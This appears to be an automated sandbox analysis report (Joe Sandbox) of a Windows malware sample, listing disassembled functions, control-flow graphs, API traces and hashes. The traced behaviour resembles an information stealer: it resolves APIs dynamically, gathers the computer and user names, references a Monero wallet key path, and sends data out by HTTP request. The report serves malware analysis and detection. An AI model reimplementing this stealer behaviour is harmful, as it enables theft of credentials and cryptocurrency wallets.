                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4734
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC45C7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4643
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC474F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC46D8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4622
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC462D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: a16d7984344e432266c7269f61d3d43f8eaeeb5c7e55513b238222bbfae899b9
                                • Instruction ID: 48485fcf5d0557f10523e20128dea98986d1cb93e0e3b347f1319020326a7912
                                • Opcode Fuzzy Hash: a16d7984344e432266c7269f61d3d43f8eaeeb5c7e55513b238222bbfae899b9
                                • Instruction Fuzzy Hash: FD4104A17E278CEAC734B7A59C4FF9F76565F527C4F517044A82862280CBB075004BB6

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 801 ec4880-ec4942 call eda7a0 call ec47b0 call eda740 * 5 InternetOpenA StrCmpCA 816 ec494b-ec494f 801->816 817 ec4944 801->817 818 ec4ecb-ec4ef3 InternetCloseHandle call edaad0 call ec9ac0 816->818 819 ec4955-ec4acd call ed8b60 call eda920 call eda8a0 call eda800 * 2 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda920 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda920 call eda8a0 call eda800 * 2 InternetConnectA 816->819 817->816 829 ec4ef5-ec4f2d call eda820 call eda9b0 call eda8a0 call eda800 818->829 830 ec4f32-ec4fa2 call ed8990 * 2 call eda7a0 call eda800 * 8 818->830 819->818 905 ec4ad3-ec4ad7 819->905 829->830 906 ec4ad9-ec4ae3 905->906 907 ec4ae5 905->907 908 ec4aef-ec4b22 HttpOpenRequestA 906->908 907->908 909 ec4ebe-ec4ec5 InternetCloseHandle 908->909 910 ec4b28-ec4e28 call eda9b0 call eda8a0 call eda800 call eda920 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda920 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda920 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda9b0 call eda8a0 call eda800 call eda920 call eda8a0 call eda800 call eda740 call eda920 * 2 call eda8a0 call eda800 * 2 call edaad0 lstrlen call edaad0 * 2 lstrlen call edaad0 HttpSendRequestA 908->910 909->818 1021 ec4e32-ec4e5c InternetReadFile 910->1021 1022 ec4e5e-ec4e65 1021->1022 1023 ec4e67-ec4eb9 InternetCloseHandle call eda800 1021->1023 1022->1023 1024 ec4e69-ec4ea7 call eda9b0 call eda8a0 call eda800 1022->1024 1023->909 1024->1021
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EC4839
                                  • Part of subcall function 00EC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EC4849
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EC4915
                                • StrCmpCA.SHLWAPI(?,00DAE9C0), ref: 00EC493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC4ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00EE0DDB,00000000,?,?,00000000,?,",00000000,?,00DAEA10), ref: 00EC4DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EC4E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EC4E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EC4E49
                                • InternetCloseHandle.WININET(00000000), ref: 00EC4EAD
                                • InternetCloseHandle.WININET(00000000), ref: 00EC4EC5
                                • HttpOpenRequestA.WININET(00000000,00DAE920,?,00DAE388,00000000,00000000,00400100,00000000), ref: 00EC4B15
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • InternetCloseHandle.WININET(00000000), ref: 00EC4ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: d3548b6d7d4c05248285ac7acfc326e1dea540c59534cf51d303a7471c584897
                                • Instruction ID: 55fe9427c86c2c6351008521cb85ec8ce604c782ea5fb1cd910065eaa635e14b
                                • Opcode Fuzzy Hash: d3548b6d7d4c05248285ac7acfc326e1dea540c59534cf51d303a7471c584897
                                • Instruction Fuzzy Hash: BC127F769102189ACB19EB50DCA6FEEB3B8EF54300F5451AAB50673191EF702F4ACF61
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED7917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 00ED792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: cec86f536b6407665ff9fe16f4f18dd1349745eca0c461ed53bd6a7bbb2285b5
                                • Instruction ID: 90ce5dbb4e347e22fbbce409cccb523a4b0dacd0bd84d3ae19e3fa7c594dc057
                                • Opcode Fuzzy Hash: cec86f536b6407665ff9fe16f4f18dd1349745eca0c461ed53bd6a7bbb2285b5
                                • Instruction Fuzzy Hash: 080162B1948308EBC714DF95D945BAEBBB8FB44B15F10422BE595B3380D3B459418BA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EC11B7), ref: 00ED7880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED7887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00ED789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: eeb95187e79aea61964998480e5236d7e515f09e1c1781d323ad974b9f725717
                                • Instruction ID: 22b15e7c101ac4eddacb07a701a78887ea9292e7df6f41d3815130b68c0861f3
                                • Opcode Fuzzy Hash: eeb95187e79aea61964998480e5236d7e515f09e1c1781d323ad974b9f725717
                                • Instruction Fuzzy Hash: 45F04FB1D44308ABC714DF98D949BAEBBB8EB04711F10026AFA15A3780C7B515448BA1
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: 581ed7e731e0f4a80c0811f99420532c18ef3d60e923205d75925ba8f2d5adc1
                                • Instruction ID: 44f5244c61b6cd173d73f545067b27bd06cb9276fe300437a29988a323922afa
                                • Opcode Fuzzy Hash: 581ed7e731e0f4a80c0811f99420532c18ef3d60e923205d75925ba8f2d5adc1
                                • Instruction Fuzzy Hash: CED01774D003089BCB149AA0A949A9DBB78FB08311F0015A8D90662240EA7254828BA5

                                 Control-flow Graph (legend: Executed / Not Executed; the rendered graph is not reproduced in text, its node and edge listing follows)
                                 control_flow_graph 633 ed9c10-ed9c1a 634 eda036-eda0ca LoadLibraryA * 8 633->634 635 ed9c20-eda031 GetProcAddress * 43 633->635 636 eda0cc-eda141 GetProcAddress * 5 634->636 637 eda146-eda14d 634->637 635->634 636->637 638 eda216-eda21d 637->638 639 eda153-eda211 GetProcAddress * 8 637->639 640 eda21f-eda293 GetProcAddress * 5 638->640 641 eda298-eda29f 638->641 639->638 640->641 642 eda2a5-eda332 GetProcAddress * 6 641->642 643 eda337-eda33e 641->643 642->643 644 eda41f-eda426 643->644 645 eda344-eda41a GetProcAddress * 9 643->645 646 eda428-eda49d GetProcAddress * 5 644->646 647 eda4a2-eda4a9 644->647 645->644 646->647 648 eda4dc-eda4e3 647->648 649 eda4ab-eda4d7 GetProcAddress * 2 647->649 650 eda515-eda51c 648->650 651 eda4e5-eda510 GetProcAddress * 2 648->651 649->648 652 eda612-eda619 650->652 653 eda522-eda60d GetProcAddress * 10 650->653 651->650 654 eda67d-eda684 652->654 655 eda61b-eda678 GetProcAddress * 4 652->655 653->652 656 eda69e-eda6a5 654->656 657 eda686-eda699 GetProcAddress 654->657 655->654 658 eda708-eda709 656->658 659 eda6a7-eda703 GetProcAddress * 4 656->659 657->656 659->658
                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,00D95570), ref: 00ED9C2D
                                • GetProcAddress.KERNEL32(74DD0000,00D95590), ref: 00ED9C45
                                • GetProcAddress.KERNEL32(74DD0000,00DA9388), ref: 00ED9C5E
                                • GetProcAddress.KERNEL32(74DD0000,00DA9370), ref: 00ED9C76
                                • GetProcAddress.KERNEL32(74DD0000,00DA93D0), ref: 00ED9C8E
                                • GetProcAddress.KERNEL32(74DD0000,00DA9220), ref: 00ED9CA7
                                • GetProcAddress.KERNEL32(74DD0000,00D9B530), ref: 00ED9CBF
                                • GetProcAddress.KERNEL32(74DD0000,00DACE50), ref: 00ED9CD7
                                • GetProcAddress.KERNEL32(74DD0000,00DACEF8), ref: 00ED9CF0
                                • GetProcAddress.KERNEL32(74DD0000,00DAD078), ref: 00ED9D08
                                • GetProcAddress.KERNEL32(74DD0000,00DACDD8), ref: 00ED9D20
                                • GetProcAddress.KERNEL32(74DD0000,00D952B0), ref: 00ED9D39
                                • GetProcAddress.KERNEL32(74DD0000,00D954B0), ref: 00ED9D51
                                • GetProcAddress.KERNEL32(74DD0000,00D95430), ref: 00ED9D69
                                • GetProcAddress.KERNEL32(74DD0000,00D95310), ref: 00ED9D82
                                • GetProcAddress.KERNEL32(74DD0000,00DACF58), ref: 00ED9D9A
                                • GetProcAddress.KERNEL32(74DD0000,00DACFD0), ref: 00ED9DB2
                                • GetProcAddress.KERNEL32(74DD0000,00D9B5D0), ref: 00ED9DCB
                                • GetProcAddress.KERNEL32(74DD0000,00D953B0), ref: 00ED9DE3
                                • GetProcAddress.KERNEL32(74DD0000,00DACFE8), ref: 00ED9DFB
                                • GetProcAddress.KERNEL32(74DD0000,00DACE20), ref: 00ED9E14
                                • GetProcAddress.KERNEL32(74DD0000,00DAD000), ref: 00ED9E2C
                                • GetProcAddress.KERNEL32(74DD0000,00DACEE0), ref: 00ED9E44
                                • GetProcAddress.KERNEL32(74DD0000,00D95350), ref: 00ED9E5D
                                • GetProcAddress.KERNEL32(74DD0000,00DACEC8), ref: 00ED9E75
                                • GetProcAddress.KERNEL32(74DD0000,00DACDA8), ref: 00ED9E8D
                                • GetProcAddress.KERNEL32(74DD0000,00DACDF0), ref: 00ED9EA6
                                • GetProcAddress.KERNEL32(74DD0000,00DAD060), ref: 00ED9EBE
                                • GetProcAddress.KERNEL32(74DD0000,00DACF10), ref: 00ED9ED6
                                • GetProcAddress.KERNEL32(74DD0000,00DAD090), ref: 00ED9EEF
                                • GetProcAddress.KERNEL32(74DD0000,00DACE08), ref: 00ED9F07
                                • GetProcAddress.KERNEL32(74DD0000,00DAD018), ref: 00ED9F1F
                                • GetProcAddress.KERNEL32(74DD0000,00DAD030), ref: 00ED9F38
                                • GetProcAddress.KERNEL32(74DD0000,00DAA2F0), ref: 00ED9F50
                                • GetProcAddress.KERNEL32(74DD0000,00DACF28), ref: 00ED9F68
                                • GetProcAddress.KERNEL32(74DD0000,00DACEB0), ref: 00ED9F81
                                • GetProcAddress.KERNEL32(74DD0000,00D955B0), ref: 00ED9F99
                                • GetProcAddress.KERNEL32(74DD0000,00DACF40), ref: 00ED9FB1
                                • GetProcAddress.KERNEL32(74DD0000,00D955D0), ref: 00ED9FCA
                                • GetProcAddress.KERNEL32(74DD0000,00DAD048), ref: 00ED9FE2
                                • GetProcAddress.KERNEL32(74DD0000,00DACF70), ref: 00ED9FFA
                                • GetProcAddress.KERNEL32(74DD0000,00D955F0), ref: 00EDA013
                                • GetProcAddress.KERNEL32(74DD0000,00D95610), ref: 00EDA02B
                                • LoadLibraryA.KERNEL32(00DACDC0,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA03D
                                • LoadLibraryA.KERNEL32(00DACE38,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA04E
                                • LoadLibraryA.KERNEL32(00DACE68,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA060
                                • LoadLibraryA.KERNEL32(00DACE80,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA072
                                • LoadLibraryA.KERNEL32(00DACE98,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA083
                                • LoadLibraryA.KERNEL32(00DACF88,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA095
                                • LoadLibraryA.KERNEL32(00DACFA0,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA0A7
                                • LoadLibraryA.KERNEL32(00DACFB8,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA0B8
                                • GetProcAddress.KERNEL32(75290000,00D95870), ref: 00EDA0DA
                                • GetProcAddress.KERNEL32(75290000,00DAD240), ref: 00EDA0F2
                                • GetProcAddress.KERNEL32(75290000,00DA8F78), ref: 00EDA10A
                                • GetProcAddress.KERNEL32(75290000,00DAD228), ref: 00EDA123
                                • GetProcAddress.KERNEL32(75290000,00D95670), ref: 00EDA13B
                                • GetProcAddress.KERNEL32(73B40000,00D9B378), ref: 00EDA160
                                • GetProcAddress.KERNEL32(73B40000,00D95890), ref: 00EDA179
                                • GetProcAddress.KERNEL32(73B40000,00D9B738), ref: 00EDA191
                                • GetProcAddress.KERNEL32(73B40000,00DAD1B0), ref: 00EDA1A9
                                • GetProcAddress.KERNEL32(73B40000,00DAD168), ref: 00EDA1C2
                                • GetProcAddress.KERNEL32(73B40000,00D95710), ref: 00EDA1DA
                                • GetProcAddress.KERNEL32(73B40000,00D956F0), ref: 00EDA1F2
                                • GetProcAddress.KERNEL32(73B40000,00DAD378), ref: 00EDA20B
                                • GetProcAddress.KERNEL32(752C0000,00D958D0), ref: 00EDA22C
                                • GetProcAddress.KERNEL32(752C0000,00D95630), ref: 00EDA244
                                • GetProcAddress.KERNEL32(752C0000,00DAD180), ref: 00EDA25D
                                • GetProcAddress.KERNEL32(752C0000,00DAD390), ref: 00EDA275
                                • GetProcAddress.KERNEL32(752C0000,00D95650), ref: 00EDA28D
                                • GetProcAddress.KERNEL32(74EC0000,00D9B3F0), ref: 00EDA2B3
                                • GetProcAddress.KERNEL32(74EC0000,00D9B670), ref: 00EDA2CB
                                • GetProcAddress.KERNEL32(74EC0000,00DAD270), ref: 00EDA2E3
                                • GetProcAddress.KERNEL32(74EC0000,00D956B0), ref: 00EDA2FC
                                • GetProcAddress.KERNEL32(74EC0000,00D95790), ref: 00EDA314
                                • GetProcAddress.KERNEL32(74EC0000,00D9B5A8), ref: 00EDA32C
                                • GetProcAddress.KERNEL32(75BD0000,00DAD2A0), ref: 00EDA352
                                • GetProcAddress.KERNEL32(75BD0000,00D957B0), ref: 00EDA36A
                                • GetProcAddress.KERNEL32(75BD0000,00DA8F28), ref: 00EDA382
                                • GetProcAddress.KERNEL32(75BD0000,00DAD258), ref: 00EDA39B
                                • GetProcAddress.KERNEL32(75BD0000,00DAD198), ref: 00EDA3B3
                                • GetProcAddress.KERNEL32(75BD0000,00D957D0), ref: 00EDA3CB
                                • GetProcAddress.KERNEL32(75BD0000,00D957F0), ref: 00EDA3E4
                                • GetProcAddress.KERNEL32(75BD0000,00DAD150), ref: 00EDA3FC
                                • GetProcAddress.KERNEL32(75BD0000,00DAD108), ref: 00EDA414
